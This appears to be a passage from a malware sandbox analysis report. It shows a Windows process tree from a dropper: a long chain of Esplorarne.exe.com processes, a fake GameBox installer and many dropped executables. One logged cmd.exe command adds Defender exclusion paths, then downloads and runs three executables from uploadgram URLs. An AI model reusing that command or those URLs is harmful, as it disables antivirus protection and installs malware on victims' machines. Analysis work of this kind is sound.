                                                                                                                                                                                findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
                                                                                                                                                                                9⤵
                                                                                                                                                                                  PID:6096
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                  Esplorarne.exe.com i
                                                                                                                                                                                  9⤵
                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                  PID:5936
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                    10⤵
                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                    PID:5580
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                      11⤵
                                                                                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                      • Suspicious use of SendNotifyMessage
                                                                                                                                                                                      PID:2776
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                        12⤵
                                                                                                                                                                                          PID:6312
                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                            13⤵
                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                            PID:7352
                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                              14⤵
                                                                                                                                                                                              • Suspicious use of SendNotifyMessage
                                                                                                                                                                                              PID:8224
                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                15⤵
                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                PID:8896
                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                  16⤵
                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                  PID:8288
                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                    17⤵
                                                                                                                                                                                                    • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                    PID:8256
                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                      18⤵
                                                                                                                                                                                                        PID:7520
                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                          19⤵
                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                          PID:8380
                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                            20⤵
                                                                                                                                                                                                            • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                            PID:8668
                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                              21⤵
                                                                                                                                                                                                                PID:6452
                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                  22⤵
                                                                                                                                                                                                                  • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                  PID:7888
                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                    23⤵
                                                                                                                                                                                                                      PID:8544
                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                        24⤵
                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                        PID:7900
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                          25⤵
                                                                                                                                                                                                                          • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                          PID:8012
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                            26⤵
                                                                                                                                                                                                                              PID:4264
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
                                                                                                                                                                                                                                27⤵
                                                                                                                                                                                                                                • Drops startup file
                                                                                                                                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                PID:7764
                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\RegAsm.exe
                                                                                                                                                                                                                                  28⤵
                                                                                                                                                                                                                                    PID:7828
                                                                                                                                                                                            • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                                              ping GFBFPSXA -n 30
                                                                                                                                                                                              9⤵
                                                                                                                                                                                              • Runs ping.exe
                                                                                                                                                                                              PID:2532
                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
                                                                                                                                                                                      5⤵
                                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                                      • Checks computer location settings
                                                                                                                                                                                      PID:2072
                                                                                                                                                                                      • C:\Users\Admin\Documents\qL6aTZpt7EGmGbtBJS6N5qFn.exe
                                                                                                                                                                                        "C:\Users\Admin\Documents\qL6aTZpt7EGmGbtBJS6N5qFn.exe"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:5908
                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /c powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', '%Temp%\\installer.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', '%AppData%\\RuntimeBroker.exe') & powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', '%Temp%\\launcher.exe') & powershell Start-Process -FilePath '%Temp%\\installer.exe' & powershell Start-Process -FilePath '%AppData%\\RuntimeBroker.exe' & powershell Start-Process -FilePath '%Temp%\\launcher.exe' & exit
                                                                                                                                                                                            7⤵
                                                                                                                                                                                              PID:7904
                                                                                                                                                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                                                8⤵
                                                                                                                                                                                                  PID:3804
                                                                                                                                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                  powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                    PID:7372
                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:5252
                                                                                                                                                                                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                        PID:8360
                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                        powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bc6269f31h?raw', 'C:\Users\Admin\AppData\Local\Temp\\installer.exe')
                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                          PID:4792
                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                          powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120bcfeb5393h?raw', 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe')
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                            PID:7636
                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                            powershell (New-Object System.Net.WebClient).DownloadFile('https://dl.uploadgram.me/6120c8f91373ch?raw', 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe')
                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                              PID:8392
                                                                                                                                                                                                            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                              powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\installer.exe'
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                              PID:8600
                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\installer.exe
                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\installer.exe"
                                                                                                                                                                                                                9⤵
                                                                                                                                                                                                                  PID:6728
                                                                                                                                                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                                                                                    "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                                                                                                                                                                                                                    10⤵
                                                                                                                                                                                                                      PID:3308
                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                                                                                                                                                                                                                        11⤵
                                                                                                                                                                                                                          PID:8540
                                                                                                                                                                                                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                            PID:8080
                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                            • Modifies registry class
                                                                                                                                                                                                                            PID:8384
                                                                                                                                                                                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                            powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                                                                            11⤵
                                                                                                                                                                                                                              PID:896
                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Roaming\\RuntimeBroker.exe'
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                        • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                        PID:4264
                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe"
                                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                                          • Checks computer location settings
                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                          • Modifies Internet Explorer settings
                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                          • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                          PID:6024
                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                        powershell Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\\launcher.exe'
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                          PID:6348
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\launcher.exe"
                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                                                                                                                            PID:7020
                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\launcher.exe
                                                                                                                                                                                                                              "{path}"
                                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                                                PID:2608
                                                                                                                                                                                                                      • C:\Users\Admin\Documents\SVvTp6XVgmDjaupwhiCU_XLU.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Documents\SVvTp6XVgmDjaupwhiCU_XLU.exe"
                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                          PID:6980
                                                                                                                                                                                                                        • C:\Users\Admin\Documents\6LGTDlklqHr_ugBFTS3a5F3S.exe
                                                                                                                                                                                                                          "C:\Users\Admin\Documents\6LGTDlklqHr_ugBFTS3a5F3S.exe"
                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                          PID:4872
                                                                                                                                                                                                                          • C:\Users\Admin\Documents\6LGTDlklqHr_ugBFTS3a5F3S.exe
                                                                                                                                                                                                                            C:\Users\Admin\Documents\6LGTDlklqHr_ugBFTS3a5F3S.exe
                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                              PID:7084
                                                                                                                                                                                                                          • C:\Users\Admin\Documents\R4FS14llhaVLNhuh_1UBG_AQ.exe
                                                                                                                                                                                                                            "C:\Users\Admin\Documents\R4FS14llhaVLNhuh_1UBG_AQ.exe"
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                            PID:7064
                                                                                                                                                                                                                          • C:\Users\Admin\Documents\XlOBmTALDmdzGggBxgXkTNmj.exe
                                                                                                                                                                                                                            "C:\Users\Admin\Documents\XlOBmTALDmdzGggBxgXkTNmj.exe"
                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                              PID:7128
                                                                                                                                                                                                                            • C:\Users\Admin\Documents\UCtx358U5TchEyetzkgw2nIz.exe
                                                                                                                                                                                                                              "C:\Users\Admin\Documents\UCtx358U5TchEyetzkgw2nIz.exe"
                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                PID:4932
                                                                                                                                                                                                                                • C:\Users\Admin\Documents\UCtx358U5TchEyetzkgw2nIz.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\UCtx358U5TchEyetzkgw2nIz.exe" -q
                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                    PID:2456
                                                                                                                                                                                                                                • C:\Users\Admin\Documents\53PbrfpT0qr62bA86N2Ta3Bh.exe
                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\53PbrfpT0qr62bA86N2Ta3Bh.exe"
                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                    PID:7032
                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\2584156.exe
                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\2584156.exe"
                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                        PID:8056
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\5515754.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\5515754.exe"
                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                        • Suspicious behavior: SetClipboardViewer
                                                                                                                                                                                                                                        PID:6892
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\3230219.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\3230219.exe"
                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                          PID:5964
                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\tBIIRqgrtYKUb48H5anb4_Tw.exe
                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\tBIIRqgrtYKUb48H5anb4_Tw.exe"
                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                          PID:6092
                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\zr97cx4azYVfX6pY_pzTXCPo.exe
                                                                                                                                                                                                                                          "C:\Users\Admin\Documents\zr97cx4azYVfX6pY_pzTXCPo.exe"
                                                                                                                                                                                                                                          6⤵
                                                                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                          PID:5604
                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\zr97cx4azYVfX6pY_pzTXCPo.exe
                                                                                                                                                                                                                                            C:\Users\Admin\Documents\zr97cx4azYVfX6pY_pzTXCPo.exe
                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                              PID:7792
                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\RQU1Eeyjr6k0VykU51pCFFZr.exe
                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\RQU1Eeyjr6k0VykU51pCFFZr.exe"
                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                              PID:6392
                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\0UDlIYAqdx58fbBuKxF2FjgJ.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\0UDlIYAqdx58fbBuKxF2FjgJ.exe"
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                              PID:2460
                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\Ub5x4PDB1ffO3V76nVSdRb5L.exe
                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\Ub5x4PDB1ffO3V76nVSdRb5L.exe"
                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                PID:6532
                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\Ub5x4PDB1ffO3V76nVSdRb5L.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\Ub5x4PDB1ffO3V76nVSdRb5L.exe"
                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                  PID:300
                                                                                                                                                                                                                                              • C:\Users\Admin\Documents\Osccyot2yP01jdLiZSrbU4EO.exe
                                                                                                                                                                                                                                                "C:\Users\Admin\Documents\Osccyot2yP01jdLiZSrbU4EO.exe"
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                  PID:6672
                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\6UIpSNXQ6X1bGK6xwzbZrjMo.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\6UIpSNXQ6X1bGK6xwzbZrjMo.exe"
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                  PID:6468
                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\QzzWzAr_j9Kq5r6IcoTisXGL.exe
                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\QzzWzAr_j9Kq5r6IcoTisXGL.exe"
                                                                                                                                                                                                                                                  6⤵
                                                                                                                                                                                                                                                    PID:6248
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 668
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                      PID:7264
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 652
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                      PID:7660
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 680
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                      PID:7960
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 636
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                      PID:8088
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 1128
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                      PID:7436
                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 6248 -s 1076
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                      • Program crash
                                                                                                                                                                                                                                                      PID:5864
                                                                                                                                                                                                                                                  • C:\Users\Admin\Documents\vrLdEfNDqg6wjThV5I51bglQ.exe
                                                                                                                                                                                                                                                    "C:\Users\Admin\Documents\vrLdEfNDqg6wjThV5I51bglQ.exe"
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                    PID:5368
                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\vrLdEfNDqg6wjThV5I51bglQ.exe
                                                                                                                                                                                                                                                      C:\Users\Admin\Documents\vrLdEfNDqg6wjThV5I51bglQ.exe
                                                                                                                                                                                                                                                      7⤵
                                                                                                                                                                                                                                                        PID:7724
                                                                                                                                                                                                                                                    • C:\Users\Admin\Documents\bUfEnV2QckatfhO4vurM77nc.exe
                                                                                                                                                                                                                                                      "C:\Users\Admin\Documents\bUfEnV2QckatfhO4vurM77nc.exe"
                                                                                                                                                                                                                                                      6⤵
                                                                                                                                                                                                                                                        PID:5780
                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\vwqOzdi1PVwJK8OTScrNyxPr.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\vwqOzdi1PVwJK8OTScrNyxPr.exe"
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                        PID:7252
                                                                                                                                                                                                                                                      • C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe
                                                                                                                                                                                                                                                        "C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe"
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                        PID:7244
                                                                                                                                                                                                                                                        • C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe
                                                                                                                                                                                                                                                          C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe
                                                                                                                                                                                                                                                          7⤵
                                                                                                                                                                                                                                                            PID:5548
                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\Documents\VHeR3A327UOUv2ALnQd1Z4r1.exe
                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                              PID:5820
                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\Od44Rf8EHJH4T2sW1PLJmC6c.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\Od44Rf8EHJH4T2sW1PLJmC6c.exe"
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                            PID:7236
                                                                                                                                                                                                                                                          • C:\Users\Admin\Documents\qwwWF3SlQK2K0TSU2M1vJNke.exe
                                                                                                                                                                                                                                                            "C:\Users\Admin\Documents\qwwWF3SlQK2K0TSU2M1vJNke.exe"
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                              PID:7228
                                                                                                                                                                                                                                                            • C:\Users\Admin\Documents\eHGLHEnRYqK4VhmYDOUgPfia.exe
                                                                                                                                                                                                                                                              "C:\Users\Admin\Documents\eHGLHEnRYqK4VhmYDOUgPfia.exe"
                                                                                                                                                                                                                                                              6⤵
                                                                                                                                                                                                                                                                PID:5252
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-5QRTQ.tmp\eHGLHEnRYqK4VhmYDOUgPfia.tmp
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-5QRTQ.tmp\eHGLHEnRYqK4VhmYDOUgPfia.tmp" /SL5="$402DE,138429,56832,C:\Users\Admin\Documents\eHGLHEnRYqK4VhmYDOUgPfia.exe"
                                                                                                                                                                                                                                                                  7⤵
                                                                                                                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                                                                                                                  • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                  PID:7492
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\is-MH328.tmp\Setup.exe
                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\is-MH328.tmp\Setup.exe" /Verysilent
                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                                                    PID:5420
                                                                                                                                                                                                                                                                    • C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe
                                                                                                                                                                                                                                                                      "C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"
                                                                                                                                                                                                                                                                      9⤵
                                                                                                                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                                                                                                                      • Enumerates connected drives
                                                                                                                                                                                                                                                                      • Modifies system certificate store
                                                                                                                                                                                                                                                                      PID:8484
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\msiexec.exe
